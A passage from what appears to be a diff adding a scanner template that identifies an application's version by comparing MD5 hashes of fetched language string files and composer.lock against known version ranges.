dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"b6946742e6e30676f2872618fda64e00\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"8f4fd5da96672e7488dd481344cfe044\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"591234e57c5695c371f818ff8ba61822\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"d812ffbf64ec4559d26dd3aad7fe7417\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4a9b23c583ad1fc4a033845ad7b21577\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"99cb487727606050d9b31393f2225702\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"c65f70aa850b186a12c77d34fd25ba6d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"e73d5f02aa62190db2c2282d2e5c8655\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"0c857dacd9fcf905d6e524a602e0fe32\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"9ab41a4bc0a958c1542e381ab6d95dc8\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"76452aa3feef5b338ff40c21f93014bb\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"11bbf7949aac71ce5c735296b2538631\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ae1ca2bd18b1e8049819ef83b3c20d4c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"9d73e3cdef1ef26e8ed6ef7ff2a1a72b\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"cd88f4f8de846981326c811d371e2068\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"45ef3548ddd5a1441157994538ea8b74\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"bf71ed0235e0ecbfa8a777922401ac37\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"62c23f1ae4598022dd0c16734850bc5c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"bad885e81637b7aeb51c50d9b7b42508\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"43aa69844f3f10e44151270c341227f6\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"512556883487fe334946c6a2149d3ee9\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"306156b854879024ad887c4e57281570\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"8d4181eb24bdb7bd4fd99a84f45e48ff\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"de312ed94957e7fb34e543fc00e43a78\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"2e1e270ef91a64aadaa2d0c790cd4d28\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"b2d69a7aa8630f5f9cbe75afbd33c1cf\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"d91ed458d7df1211111de8d107d00ae4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"507b1c068af9a2adce9b0d7f87a01c59\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d90b46590d86b4c12a4da9803be946f9\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"045d3209282f39fcd9b8170314fbfb7f\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"80282020404d05c5bf17e2909508b40b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"13f4aa0f71cf5145b488c9f2557cb57e\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"540723e70ccb0ddf0031f65339266c18\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"baa0257cebed328b0c81ff96ddcddad7\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"23d96f1bd61409b1f462b5f1baac6005\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"a092c454345342c98148c1418e77bd6b\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"bac705b7d7fe8175ab2485becb5f3ee7\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"68f08d63cc36cb99474bbaacb54d6762\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"87a710596bf4e1635406ce21ed3d0566\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"655d9dfd92496a115684117ddfa686aa\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"d8bc4456057b30e4987abb0d2d940d12\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"fc8c2164c573ddf4c8e03f4051862730\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"c1aa39979f0709cdebcf3eee11d17559\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"65d4c6549f6e9d33d1fc4d6c9d2bc506\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"ec9d0f0270aa1978db2da36c12196384\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"698c86558c9f84ff43f4229467c1cc4b\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"ed5f1cb304748bcf259ed6a64487997d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"01c75123ee448fceab5886f414cf1e2c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"5ec84522caeb3f06df5e50f18c6b07bd\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"64a33624b6a80a8ed20061e53f05c2d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.11.1 + dsl: + - "(\"41045b1e380431b2f95281014372fbe2\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"0095990bf4292284ab7b356bb9950a8f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"28a84024709bb922a43f5258719e32f1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"5eb30525bf1e13d4cd922d7794fe15c7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"f9709452a5ad18b597c4272e35fed149\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f70b2c5a78d6e6ec7870226934f5afa5\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8ebbcf040efdf8b88450003dab35b458\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"87e063070c41eb7c9529e76141842cec\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"5cfd1f2ff69181aa7ca2a136d631b8f9\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"cad2f84adcda262b1f4d6097811396df\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"0ca9568e6f9c9b982b046708c8504673\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"e051a4f09d9bf5fa0c7e02fb8f3bc2ad\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"e917feb832aabae5574dbe478011e9c5\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"cfa1e4e704072e15fa103553a7a9a390\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"422a0c12f11bbf3f7a732c4498e94db3\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"5631cbb1b11dd1abeb6f597617e70a73\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"d92be31c984915a39da49023623b0be7\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"be905189d2c73fa600e0fe2488ba2bf1\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"90ef3ca38eba9084c7aa93d22efa64f3\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"57c6e46d970e7a07e29d74d57a48942e\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"289c32600bf71c8ee3f233642954ccff\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"88b113966210243857249696b3731e01\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"85aed2ebe277217bc950d47e9acf4f0f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"a572de12f64bc44f2d5db74127b94b5a\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"2bb96ba7f4e42c8d3179acc665a65841\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"1f1a4ec2b7d8d9210e7de07663ee95ad\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2613067a0b730b93fce16308eb120129\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3f2683668b96f777670a8ba3eac44de4\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"9dc65957836083d4c5266ae74356998d\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"457321020f946a34916d1ceee3a372d6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"7652e1825d965e8e4db5757cf9b16a24\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"bf84acebb4c0a47429035de60da3c2e4\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"2c4e76c85a7711fa6822ce0bdc29c09b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"c6443ba4eea184cbdf52ba670189344d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3e9108e7e9f0919a2f581657c1038060\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"4c3e262695b2515362624f65ad318a92\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4e62a881975b03598aec63702bb48067\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"90bbf23aa5514c5a6c5a8fe65f8020fb\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"fdc4da12769c36e966f83ec9592ea4f9\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"1433c40320a63977a9130a98d4604fd7\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"41828817e0b59cbdd36a9c918f6f0a92\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"8e0c3f5b06f29c7a7757749934d4e719\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"f9b890063de92ee7c84f4f21e5c6950a\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"0643fe7c47d5c7068e47a332e15de071\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"c6e5d0b7c821270fb6d437e4f8381346\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"a86be9c5f80e5f7ea741a33e4756b1bd\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"5d1137bc78e0e2deaf4c90f351a40bbd\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0b8f15a8e5d74073b7dbfd6218187f2f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.11.1 + dsl: + - "(\"b4a33b03b32107511ab84abdb999240f\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"b78a81c0a7823360215dc5c51fe5abba\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"68d7d1d77c7af00a8c3aa38e6fe2f6bf\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"2858621dcaa78ca68940951ef9658cc1\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"8973c98e43648f54548113ee46faca7f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"48f554a45197ae838b27f90513ff92a1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ff025bc7c7e80086e07f0988aa1c95be\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"4b929ff78078ef7c1fd3ccc6c283723c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"c2a596eff0fc0ea90758c492adfe67ac\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"378fc5becea802556d7e46287c459343\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"539370494eb75c4e7300c5a55ef62b16\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"abf364d7e4313d7a53168a48a24c6ce3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"62055fe4d36ea8193fac2bd892504602\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"994d0dd53c86b86b5339fa8ddd455346\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"2148f58b0e7c05dcb0b949af6973fd71\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d93b9a3936eefd681c5e33a086f2481c\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f2e136e89879d7ca3b8765bf9eaedd22\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"288782bac427f102544b2d6800a1044a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"9d396b30e3c64540c56c010b3487025f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"3e9f2326b247d10d673e15c00697353f\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"1b1eb0cf70b38653245c03cec7d25362\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"385cc3530994c85f04bdd595dbfd8f0a\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"c94da30340c94a99dd8c8079e1f9c765\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a2ccb0879d10a9f0c9123247e2a30d07\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"26a9f42a837d546b1917e18ba2b6c4fa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"8fcdb92778673e05bc7770173743d5d6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"d6337588f1bc8e83c5583e574f764ed5\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"8348f89278c44874501eacd6a17f2824\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"8cbbefb1e1caea9b30cffa18d3d1fbc0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"a7d120059bb10dc0692240b5a868e534\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"c0249ea5162326e924b65d2ca5ad2b3e\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"15346bbc6531e2e5ef766cce97ef0d01\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"879ed9dca02390d6a7f46aa7a606da43\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"be06934f2192f02c94dde7ab591081ac\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"7bbe2827c94e8d7e9364cfda370c7868\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"15daa5872b646f88ff3d19381d976978\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"963e6cccfc551f665243887d1e9d6082\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"afda5c611bdeca2e6999c2643edc2f1e\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"705207608900e87d2ab51c9afeab9e76\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"d764fc87395a9bf0bc66b6f8b92140b4\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"12676475d5ae48d1e1b2042c1edf6889\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"5873e5a492f38ea76ba8cd3906ca21e6\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"d9de89c53457d16fc979a47756919cca\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"761be5cc5e406bc53b3cb6ed1caf1353\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"636621d5f1e18fc9cca9cd43f4cf4d85\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.11.1 + dsl: + - "(\"d4f9777bf5bafc739667d0dc388a7a93\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"6fbe51f54f90d60835e7c34d69e71589\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"fd95896edd542c6f0fecdcfd34b565df\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"f55cdc8e395527acce544c1ac71599de\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"572ae8987f5a0ea01787a6aa510d4476\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"7265cdd72310c9636fdc06a79b927491\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2783e4731a370653f282edfff323509d\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"66f732836b43af91f875973e040bea3b\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"509d56de9bb9f15f4f909852c0e2b209\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"2f50c7dfd16e6cbd087fd554fef73f79\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"a5998e359035164dfc1421d8ea3fd15b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"8fbd2458dcf35fe9be5b025f9b69dccf\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"8c7af6e2deb2115891e109040f43fffa\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"1ff24c14c0e6a80893301d5986b65e36\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9c0184d70bf09f64b9656ef053e7d686\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"5824137f110982c9a5abded014738484\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"5e2f855a6325fc704683dd17cfe129e8\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"0fea818c14c81e5203e1f016310517bd\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"de083965afefb1a272360adc7fdc1abe\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"0c494d53eae8e9b99dddb0cd2f900a9e\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"19d66d1c7dc7f4d90bded20b52350a34\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.7.1 + dsl: + - "(\"1a1501f9bb3cebcab2235d3d997879b8\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"033ffd217384e85e344743f48a651558\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"71e01d14bd75df57520e86e0717d9672\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"2dccd72eeaba5f657363daed413eb077\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"ef2fef72efc97b441bd348eb2bc2ee88\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"130dc9f84277fe3c38431ed92b99eb94\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"85c93d39ebd6ec2372f81cadbe6fb613\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"bb3bf13f39b5e251d6213a97dd4025ed\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af050211e5e609ae11cf7b2e187960b3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"280a5a4bb4401e57cb260fc8056f5ea5\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"ac8d060b8b8e4d625c64d9655ce79752\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"85bd48ac6f5224bbc792db899b91322f\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"c8bd9a0ff1d373d6ca28c62d0d6376ab\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"a1e195cde329568cd805474c96989ce2\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"e5b8a401df67d1d42b8d40a592fcf1dc\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"fcb2be7f83c4f71a5656539491df901d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"18309751ece1279c3612c214260a4d1c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"17af771e8df42de347a52d4f54a63d46\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4914951d4069b06e0f0fbf7915a495cc\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"ee99ad481a578ed7fb09a60bc824fa84\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"c4c8d54edf304c639f611a7be9336f8f\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.4 + dsl: + - "(\"5199b095c29e16e72468be65d83cdaee\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"98594a960efdfa708178e98f26a6b0a0\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"0c288a4062e6753818318b580b4099f5\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"400723d1e58c830b7936b897741c4379\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"7cda2ab7eddad368935bede6f861e228\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.11.1 + dsl: + - "(\"76242c86eab437aa7452d084d76d74ec\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9931f4d7f7bf87ae822de62a48d84c33\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"73a9c84fefa8af310bae0c49def73df3\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"db5ab33f0c45e98cc8213a3dc75f442d\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"6e1f5641d4b0372bc2b6f760ec43fdde\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"c7bde16da39650d3c85a25e782f88e3a\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"48af7f005dcbcff2882f91e037a073d1\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"da2739272aa310b3a446f4b03959093f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"0003c6fde54b2bd3dd60f07c04446ce9\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"851420ea5844908bc636e511a88990af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/composer.lock" + + matchers: + - type: dsl + name: 2.6.0 - 2.7.1 + dsl: + - "(\"7ba4b1486d3e85b3f40c688629bce965\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"a5bdb43d887009fba95e1d2ffb4157b2\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"b2baca8bf95bc558959b83103d97efe3\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"7b332f433c559ce15c5370b351af4911\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.0 + dsl: + - "(\"8b015cbc2147000df6e347f5273f6bb3\" == md5(body))" + - type: dsl + name: 2.12.1 - 2.13.2 + dsl: + - "(\"9a66c545a8a748a4ec8f5efe371bf9ea\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.18.0 + dsl: + - "(\"5435f4ee2e1fafccb0242a274d457cc4\" == md5(body))" + - type: dsl + name: 2.19.0 + dsl: + - "(\"66b1df02c7565a864f79685f24942684\" == md5(body))" + - type: dsl + name: 2.18.1 + dsl: + - "(\"faef7be7408615eb2d40e17c82bd2bf2\" == md5(body))" + - type: dsl + name: 2.20.0 + dsl: + - "(\"19443f96eeadd4fec33386168bb162c2\" == md5(body))" + - type: dsl + name: 2.19.1 + dsl: + - "(\"21f5bd7edc9e23e2f0037b3013ff6439\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"c7f6735fe82befcdb3407b32eb2cf67a\" == md5(body))" + - type: dsl + name: 2.20.1 + dsl: + - "(\"28542416ec1ab82c0ab42439673b4436\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"188ad61f5f6f06c1114176d2307aadc9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3a9c05e196c8ac7afecbc435044a34b3\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.1 + dsl: + - "(\"c0c084696f2fb41a14e5a94c0db2dadd\" == md5(body))" + - type: dsl + name: 2.24.2 - 2.24.3 + dsl: + - "(\"7cd766a52c0a06c0784c7db45344e793\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"7afcb71d3737045eed559a00aab6185b\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"76c2175804e5d3177601684851756ce4\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"2e30a321b2b2735182dfdc31de67d2aa\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"25120fd17aff050620ba51fd3c1ceda8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"00c0e18d8ac127c7143250c71aee61ec\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"0de0a0dca2bcce14b2474453b34dc224\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"87f26140871eee5e4a29be3955a17ba8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"c0fc7b6610223d8740898fd0c40912fc\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"80eac74f56f9f63e9c62bc9d9f14381b\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"0db98880b11e1f76133f24be8b9229d6\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"13b37b7608788010a3f0bf2857295b62\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9e090a22700c8f5678c5e0bd015aa543\" == md5(body))" + - type: dsl + name: 